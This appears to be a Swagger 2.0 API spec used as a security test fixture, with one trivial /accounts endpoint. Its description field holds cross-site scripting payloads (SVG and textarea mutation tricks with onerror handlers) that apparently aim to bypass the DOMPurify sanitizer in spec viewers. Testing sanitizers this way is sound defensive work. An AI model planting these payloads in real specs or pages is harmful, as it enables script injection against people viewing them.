swagger: '2.0'
info:
  title: Example yaml.spec
  description: |
    `<svg><annotation-xml><foreignobject><textarea><!--</textarea><p id="--><img src='x' onerror='alert(1)'>">`, {CUSTOM_ELEMENT_HANDLING: {tagNameCheck: /.*/},FORBID_CONTENTS: [""]}`<svg><annotation-xml><foreignobject><textarea><!--</textarea><p id="--><img src='x' onerror='alert(1)'>">`, {CUSTOM_ELEMENT_HANDLING: {tagNameCheck: /.*/},FORBID_CONTENTS: [""]}<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.0//EN" "http://www.w3.org/TR/2001/REC-SVG-20010904/DTD/svg10.dtd"><svg id="slonser" xmlns="http://www.w3.org/2000/svg"><?xml-stylesheet > <img src=x onerror="alert('DOMPurify bypassed!!!')"> ?></svg>
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
